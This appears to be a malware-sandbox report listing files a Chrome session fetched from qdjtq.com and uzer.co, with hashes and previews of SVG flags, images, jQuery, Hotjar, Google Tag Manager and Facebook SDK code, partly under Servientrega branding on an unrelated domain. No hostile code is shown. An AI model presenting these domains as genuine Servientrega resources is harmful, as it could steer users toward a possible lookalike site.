            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="peru">.. <path d="M1.72253 0C0.771174 0 0 0.77315 0 1.72694L0 13.3807C0 14.3344 0.771174 15.1076 1.72253 15.1076L7.66668 15.1076L7.66668 0L1.72253 0Z" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L7.66682 0L7.66682 15.1077L0 15.1077L0 0Z" transform="translate(7.666992 0.00018310547)" id="Rectangle" fill="#F5F5F5" stroke="none" />.. <path d="M5.94415 0L0 0L0 15.1076L5.94415 15.1076C6.89546 15.1076 7.66668 14.3344 7.66668 13.3806L7.66668 1.72694C7.66668 0.77315 6.89551 0 5.94415 0Z" transform="translate(15.333496 0)" id="Path" fill="#FF4B55" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with CRLF line terminators
            Category:dropped
            Size (bytes):7040
            Entropy (8bit):4.655495934515554
            Encrypted:false
            SSDEEP:96:+WZzPw+ir3ethaSTPi+/9RCG4XpPRhh9l6+k9lhBWH0rABWH0r9RFPfv:7zPw+FPVRihPUFWH7WHIXH
            MD5:7F91180E4C55C5289F0EDE29001B77CE
            SHA1:C49EC39D5FC31772836583A2AC5B00422A337D5A
            SHA-256:D98FFF5BD37731607459934B129FCF5A9EED2960AFDC10879B5586584BF5361E
            SHA-512:C8C3B0E42D9CD04BC6C6E48F160D94F08198E5468289EAB1B3A702AF0D3E710CDC33C9B6AAD1F5BC4DAA4B4582603BEC501326F64EA95DE0060194553EB7A2AE
            Malicious:false
            Reputation:low
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;..$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.submenu-collapse').addClass('show');.. $('.first-lvl'
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65447)
            Category:downloaded
            Size (bytes):89501
            Entropy (8bit):5.289893677458563
            Encrypted:false
            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
            Malicious:false
            Reputation:low
            URL:https://code.jquery.com/jquery-3.6.0.min.js
            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):4900
            Entropy (8bit):4.506731891504076
            Encrypted:false
            SSDEEP:96:q1mPpkzqO6VfBSE2k99BmM0R8eFoaykkZGH:Sp3+V2kjBmM0RToHZq
            MD5:07B36F8AB24C62887848A83B92C500B5
            SHA1:99E5A0CB980E1D9690C8A399B4D6592C2F8A32DC
            SHA-256:2E6A5002DABD85D84D3FB481C610E1069562022C19963DAED0F238E11CCA2A33
            SHA-512:9B7208EDF8C3F37745B4DDBC6BC050B0F2AA27E7195A02C754FBAB52AF38CC1C1C2A19A592A26A097F87DCCA8CF568A6D9DFFE8912F242EB185CA3D2C1E80167
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 14</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-146.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-14" transform="translate(60.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-11" transform="translate(0.000000, 12.893769)">. <g id="Group-3" transform="translate(10.500000, 0.000000)" fill="#009A44">. <path d="M30.5531449,14.1506171 L27.8758304,14.1506171 C27.6334276,13.0941357 26.6321555,12.3023561 25.4369611,12.3023561 C24.26
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):32
            Entropy (8bit):4.327819531114783
            Encrypted:false
            SSDEEP:3:H2ynaKthoupU+:PnbT5
            MD5:8C22CD9BACE32763711C140839D7FF17
            SHA1:A537B387FA5C9D445F3E3B4866172B453F8065E0
            SHA-256:9A6B776B7DA775817BE65EADE943E0D55AB9918A8392FB8708547C793F017AF3
            SHA-512:3554700663D0E19D730706C24A8A85468A7304D81600B81EE44673350766C3AABB32D6745D322F6DC9907691141FDC4DE79C038ABAD4BE9209DF10C6F9E77C7C
            Malicious:false
            Reputation:low
            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAnLi7V0X3afVxIFDbmZCLwSEAmLxg8OQk4rVRIFDbmZCLw=?alt=proto
            Preview:CgkKBw25mQi8GgAKCQoHDbmZCLwaAA==
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 600 x 360, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):41593
            Entropy (8bit):7.971721088703926
            Encrypted:false
            SSDEEP:768:VaH5s0Pmv2h4k55mhemS5KyVfXjciZuyWTo1w9d6djB8Abdd1VKV9o6sa4cTWNmj:VaH57mX/hemS5ToT39d4jB/51od4cqNa
            MD5:57DC77DB8A3CB2ECCFB06640F12BC104
            SHA1:4721167D2A228E1B941346E493F5943A634BB74B
            SHA-256:C46A430B80DCD1A2C599308E610A0AB4B7760DEC0BD2216834F4087E275ED994
            SHA-512:54D7AB839B9C75D347444E0B947AF2EFF25B4E35255BAEE13D3E916652DC9A748AFCCDBE73DD6D283F9AEA230F400EA0DD3B93EE51179FB5CA2A27F0C07D2BC4
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/imagen-blog-02.png
            Preview:.PNG........IHDR...X...h......*u.....PLTE...A.........D.?...z...........@..............9.........................*........................................*.............k....."........1..........,O...u........z...9......v"M....(......;[............b2.......G)..xS.r.{....k...r....j.U= ..c.|X....oI..........sP.....xE!......i;T2 ....g@.a...@/..~3..4U.F........Y.l.j.......Nk..zK......Db........rD..[$.`.r.........{d...f9 ..._>-w....}P(..oC...f.....Xt....c|.....x.sD.kS.t.M7.cI......vi........I7..sZ....[G............5........h]wL@.a...%...U.d)c....s1.....{FK...qR.q9.P0.Z:<&.......`.R..;&..{@.`1......J...v.T5.rL....K..g.lO....#..:(.KJ.........cB.0F.w.....Lw......sc.=...t....Jdsg0.X#a.#9.haDA@^I......b.b.b[P%...S............ (.P@.-'.HL..I.....tRNS...B/(....%IDATx....0..).'.%<Z../.`Fd........)L...@.JL...X"...acd@.d...w.).?.D.B..m..{}...sr.^(..w.S...axw..)Q..1.".Qpj^.....F......X........:WN."..h^....d...'.WE.u9.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):17096
            Entropy (8bit):4.06268773612239
            Encrypted:false
            SSDEEP:384:yRIaq2IcnRr9ATrKeIYJwHe5NVMtkmvzYeC5OWLIV4lC6:yRIa2cnRr9ATW5u75N1mvzb4l9
            MD5:4E76A20309EC1E227FB24B73C1D80F62
            SHA1:4349111C3A9769B172B35FB7A5C67DF45E12680F
            SHA-256:6E538FD4830A9E6A7249EE815FDA61CC682CE78926D0B04EB1A553D708F23AAB
            SHA-512:FB51B21BE9A45EF1B8E5504B7DCB1416FC00759210AA2F1F33E422BAC14074864A56FB2C2B7C701C3C922CB06D1281D3B7348FCF9C1FAFBFE9F7C319DAEEF4B2
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/58.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 16</title>. <defs>. <polygon id="path-1" points="0 0 27 0 27 21 0 21"></polygon>. </defs>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-608.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-16" transform="translate(522.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(0.000000, 8.893769)">. <g id="Group-3">. <mask id="mask-2" fill="white">. <use xlink:href="#path-1"></use
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows icon resource - 1 icon, 96x96, 32 bits/pixel
            Category:downloaded
            Size (bytes):38078
            Entropy (8bit):5.659515181584008
            Encrypted:false
            SSDEEP:768:2439j78bGLLLLLLLLL4LLLLLAIXSSSSSS+G47qgQuQ/cccccccccccccccccRcbH:2iJFG2qNL/cccccccccccccccccRcbc6
            MD5:F264619A74D8B662E7A695C2563A9BCF
            SHA1:5A204AA829B002B177210B8A0112A1B1412FDA29
            SHA-256:309EE1AEA13A5C6A63F0689D70476FEBB5771B3209D6779B5B97D3CBDB76525E
            SHA-512:217C23F33C789FC1D2DFD4E60DF5F4BF988474A25F63A63A058267F557C76C37A30C4DFFCF2A64521DA3E679D1E30A3EDBB9BFC8681264D00A31F12883C3327A
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/favicon.ico
            Preview:......``.... .........(...`......... ...................................................................................................................................................................................................................................................................|...TEEE+........................................................................................................................................---...............................................................................................................................................................................................................................................................V777.........................................................................................................................---.........^.#.>...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 600 x 360, 8-bit/color RGB, non-interlaced
            Category:downloaded
            Size (bytes):67735
            Entropy (8bit):7.99362594138623
            Encrypted:true
            SSDEEP:1536:s22rWZdwqXfU+6zy5Vb/kcBOFbRUDE+aItYq6lLqOff:s22SZdwgfUBm58J6DE+Lyq6lGA
            MD5:0ADE999AD0B41A855F125E508D32EA0B
            SHA1:00DAEE6AADE4662005587AC0C111B30305357E51
            SHA-256:1D11FAA982515471AA792DAF561B196EECB4561B42137CA20C79F66F0CA937BB
            SHA-512:7F8A4126D25A1A81A9C56651DCDC64ED18680D68A62B5DCE569863153A9D5783C8199CD5433FF8D71D5FFB7B0ED2A8149A426E76048027B2FB7357D380FEEB61
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/imagen-blog-01.png
            Preview:.PNG........IHDR...X...h.............tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.98d7942, 2022/03/21-11:40:59 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:22E7F55C991911EE8D36F3C02A9F2D0A" xmpMM:InstanceID="xmp.iid:22E7F55B991911EE8D36F3C02A9F2D0A" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CA489C81990A11EEAA45D698A28D96E0" stRef:documentID="xmp.did:CA489C82990A11EEAA45D698A28D96E0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..k.....IDATx..].`.......:.....{o.`.;.8..jB..&...~ ....1%Tc.1......E.V.....g...Y:.}.N.|...^..}.{o^..$............
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1830
            Entropy (8bit):4.895693398229686
            Encrypted:false
            SSDEEP:24:2dZnmPLS/veaxMdPvZVm84Mye40GaRtunEM4dGddW3Ed8vnyBNiaMNnA1o3HGX8z:cZmj5GM40Ga1kPWUOfMiP0Ju
            MD5:A3BF997BBD1F4D2C76AD1C98CDBD8898
            SHA1:F45C66D7C871747C5F26E653E2CEDDEBEC4E3F8B
            SHA-256:F93160F4DA84323C740482D6F69B8CE715782C717B4B115301D8005E7A681714
            SHA-512:78BF05643AE7657C0C5F25B8732F7923EB1FCDBE1FDB43DF079B9F46E5B47C21E17648EB74D85B7BB51D25B0FDDA1E348E68C859A4BB7188A0D29572CBD57FEF
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/ico-procesos-02.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 59</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-656.000000, -762.000000)" id="Group-59">.. <g transform="translate(656.000000, 762.000000)">.. <g id="Group-53" fill="#C131DF">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="search-(2)" transform="translate(28.000000, 28.000000) rotate(4.000000) translate(-28.000000, -28.000000) translate(17.000000, 17.000000)" fill="#FFFFFF">.. <path d="M5.13691882,13.7392452 C5.91652965,15.0030061 6.98415801,16.0706772 8.24813281,16.8504592 L3.79521822,21.3033738 C2.93612773,22.1624643 1.54326583,22.1624643 0.684175338,21.3033738 C0.68413256
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (11922)
            Category:dropped
            Size (bytes):13051
            Entropy (8bit):5.4071605765986295
            Encrypted:false
            SSDEEP:192:LbnBH5tmjHCR/UeHjXWb2pTOnBwatCp0NFnWxWkMTMm53NiE:LbnBqjURHjXo20wwCi5kMYm53N5
            MD5:B073A4FD1AAAC45BECAE527F47E6795B
            SHA1:E4469EE8BDE7CEDE14C8983883126EA4300B500B
            SHA-256:EF0AC812141070E60A504C58DB6389E723C8FB521704010A9E15F2CA7FA323D6
            SHA-512:6DB8EEEAE65922927DC2E3A9418C632CB012EC63036EBC5A17BC048D7DF43C651E4F00AE7F9685C46E6E75E62CF25F56BC1DE7BF8B7C675F6ADD66D8B90B544C
            Malicious:false
            Reputation:low
            Preview:window.hjSiteSettings = window.hjSiteSettings || {"site_id":3513970,"rec_value":1.0,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":true,"session_capture_console_consent":true,"anonymize_digits":true,"anonymize_emails":true,"suppress_all":false,"suppress_all_on_specific_pages":[],"suppress_text":false,"suppress_location":false,"user_attributes_enabled":false,"legal_name":null,"privacy_policy_url":null,"deferred_page_contents":[],"record_targeting_rules":[],"feedback_widgets":[],"heatmaps":[],"polls":[],"integrations":{"optimizely":{"tag_recordings":false},"abtasty":{"tag_recordings":false},"kissmetrics":{"send_user_id":false},"mixpanel":{"send_events":false},"unbounce":{"tag_recordings":false},"hubspot":{"enabled":false,"send_recordings":false,"send_surveys":false}},"features":["ask.popover_redesign","client_script.compression.pc","error_reporting","feedback.embeddable_widget","feedback.widgetV2","settings.billing_v2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with very long lines (435)
            Category:downloaded
            Size (bytes):1638
            Entropy (8bit):5.142734146923385
            Encrypted:false
            SSDEEP:48:lp6p9kcrVAGpAL+RdZyFjHyoH/XlukT2F1bziHpeiHSoH/w:lEHr6DCZydHRH/XluB1niHciHxH/w
            MD5:595A5271FAF74C74C9658E623A319F48
            SHA1:D427C62A5822B63B948D7925B9034299E22736F9
            SHA-256:F2069D6BFC54C2F6C34E1EBFA5FC41FB21DDCB00B51BEBD04FFE1ACFF530F0F6
            SHA-512:DAED9262A3622DB2F86E58BAE9454D5A4E572379DAD7A371EB3AB8934E4134CFBAFA92D679FDC84D4A0C2D81391B03B5E9FE99120913D07028829D7B8FEB50F8
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/
            Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <meta. name="viewport". content="width=device-width, initial-scale=1.0, user-scalable=no". />. <script type="module" crossorigin src="./assets/index-7c1edef8.js"></script>. <link rel="stylesheet" href="./assets/f6170fbbtE5dP.css">. <script type="module">import.meta.url;import("_").catch(()=>1);async function* g(){};if(location.protocol!="file:"){window.__vite_is_modern_browser=true}</script>. <script type="module">!function(){if(window.__vite_is_modern_browser)return;console.warn("vite: loading legacy chunks, syntax error above and the same error below should be ignored");var e=document.getElementById("vite-legacy-polyfill"),n=document.createElement("script");n.src=e.src,n.onload=function(){System.import(document.getElementById('vite-legacy-entry').getAttribute('data-src'))},document.body.appendChild(n)}();</script>. </head>. <body>. <div id="app"></div>. . <script nomodule>!function(){
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):1352726
            Entropy (8bit):7.976143930604846
            Encrypted:false
            SSDEEP:24576:i+V5Wr6VDFzMmpLn5VTg+MSiQmQ5Mxz7wyb5BosS9ZL:bWOnbpL5PMSiQr5EzPksSz
            MD5:B02E3F80F885AEEE501B19CE6614950B
            SHA1:D5A9A52EF9B3A9A18AD6AB15C419E8A1BF8A2277
            SHA-256:FC3898E5E5A9538D20EF53F1A39A4EEA7602C8B2CF40C552141E168906A1D3CE
            SHA-512:31BF336DB618FF8327777C8913DFD82992D19CA9A776E7D6AA24CFAA909F9B0094DF51E7A928AA2F355C3F37044D0605DB30CFC86194D6DE4C11ED3F8AF110FB
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port6.png
            Preview:.PNG........IHDR.............S< 9....pHYs.................sRGB.........gAMA......a.....IDATx.....Jn-.h......_I...RY......D.#0.....|..W."......s..d..>T.W...3..~_k,......?....g.k@..Y............8d...>...}.5.>.[/..y.}~...-....l..[..0..^...s......".c...Ayq....|.9..g...........sa..8...zl..Dl..?...%.8.M..oq..V.8....*.......w...IN..H.1QG.A.o..........}......?u.-.......y.......o.t;t..I..|J.6\.n......)H...A....6..s&C..6.i.w'.......i".@..~...G*......5...vXk}.P^P|....!.l.m.9..5.nvl...=UM<L...x..g..KE..X....R.2.&........#.'.*y.....&.).;.....e...\W.'d...1X.....Ca..........\...r.+,.@....Z..8r.h...iv.....8.....j....)N........xD^{2.._...('..{nw.RO..s......W.^..wN.y..w...4..?k..c.M...V....@,?..HB>.M......../|5xx..H>%.....q...P.{<.....y.....n...s..L>._.E.......i63i...c...+N.rP.Zu^.....o.[.E.0.F7.w...p._.0.{./....>7.9j...Kv]5....3I.......y.@.....Oa^.^.V.{..P..{.(..........s.......e..........=..FV............O..?.)/....8.2g.......bf..a?.n....>8...Cz.BN..,'FH$...K.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5552)
            Category:dropped
            Size (bytes):77036
            Entropy (8bit):5.328453855577691
            Encrypted:false
            SSDEEP:1536:RJeUwT76HXhpwNCHM9ZK0BK01QJnYTZ02LKVsdmpyKcicy:RIT7OXDs9ZKAKBtYj8wKcHy
            MD5:2A88709F5260F30592422F09E3994FB2
            SHA1:FC465160D780585AAF110A74DDCADEA843BC3BE7
            SHA-256:22E11E43C7C03DE92FBC41E24B5E19FE0CE1BC2B45498B6CBE0502CE28B25690
            SHA-512:7C9047F3A8338D7F0223368EEBA68F9DBE7636C43D3C2AE015E9D0EEF8276153227ABE45D05AAB7FBCCBBE983B4F5F01196857117C0309A43712078E3B7100C6
            Malicious:false
            Reputation:low
            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5945)
            Category:dropped
            Size (bytes):352256
            Entropy (8bit):5.600773330084847
            Encrypted:false
            SSDEEP:6144:g4JCpmFURJlq04d7npJsEsOemveUN7X0fxnzQ:JJLWRJQnhpJs7c
            MD5:8A52D88E99FE7F26A6A6B54FD956BC47
            SHA1:AE4B479577A722C6B9D5557BF7E23FB0911607FA
            SHA-256:2FF948DA89F91273489D20B369DB0AF26923856C558309FB43A941DCC1E8859E
            SHA-512:1155B2A301592619E599AF24BAFF09D38974A1FBA2CAC12B7CDD06BF4808CF326F98CEF5E9DF5A3C10957C1F77F3824105350385C3E2FE2E157EEA37F3DA8A78
            Malicious:false
            Reputation:low
            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ads_datatos","priority":24,"vtp_instanceDestinationId":"AW-10981864615","tag_id":16},{"function":"__ogt_1p_data_v2","priority":14,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_f
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):723
            Entropy (8bit):5.176013741006285
            Encrypted:false
            SSDEEP:12:TMHd4ln5cQiYxJNHlCVnu5BQo+6QkY0MlPyMbOCsCbyP6ulMlpKGhHSKjG/:2dUn5cIxJ+4QK1Y0Oy8tbyP6shGhjj2
            MD5:F4D98F8C78FBFCBCCEBF3DDEE8C57FCD
            SHA1:CC326C8EAC2B0F090FE47CB21166EB2918AC65AB
            SHA-256:B45C8BBB431137470629CF552EC70D10150870634F3A895E9850C3809E02BCFB
            SHA-512:D1CE671E76CF356C1D8AAB4F33DAB034629D6A39B2A9E686E5EB8CB794EAEA0F24ED9AEACF6AF30CFC43212BA73D7BB64BE2C9CF56C4D610F0528BC306FB166F
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/flag-col.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="colombia-(2)">.. <path d="M0 2.03535C0 2.98231 0.771174 3.75 1.72253 3.75L21.2775 3.75C22.2288 3.75 23 2.98235 23 2.03535L23 0L0 0L0 2.03535Z" transform="translate(0 11.25)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.767645 0 1.71465L0 7.5L23 7.5L23 1.71465C23 0.767645 22.2288 0 21.2775 0Z" id="Path" fill="#FFE15A" stroke="none" />.. <path d="M0 0L23 0L23 3.74991L0 3.74991L0 0Z" transform="translate(0 7.5)" id="Rectangle" fill="#41479B" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 408 x 156, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):6103
            Entropy (8bit):7.936406890177829
            Encrypted:false
            SSDEEP:96:pGE7SrQdDhNj20HnWIXxyBuNombamCzPT7YynfYYDEpiki+65x8Zbbu2YoIMmCY1:pGuwSDhNCunWIhyBG9bsbTcO+iL+yxmY
            MD5:8B3100AAEDC6ABF7F24C067CB31850D0
            SHA1:192703563E40EA1A5CE0DCDB42251D3D1E2D1F3E
            SHA-256:6976775C3618DCD54A3730654FE4F5B6894F7DF5201EF0E57089B0AC9CCCD554
            SHA-512:364B7910D101C86FBC0B284B48BF965D6507F89D448B4FF47862EBB36C3F79267333D8A00963FB37BF960D41DFCCF4CA4257FB0CA735573D98B74362B8503700
            Malicious:false
            Reputation:low
            URL:https://mobile.servientrega.com/WebSitePortal/assets/img/icons/ico_rastreo.png
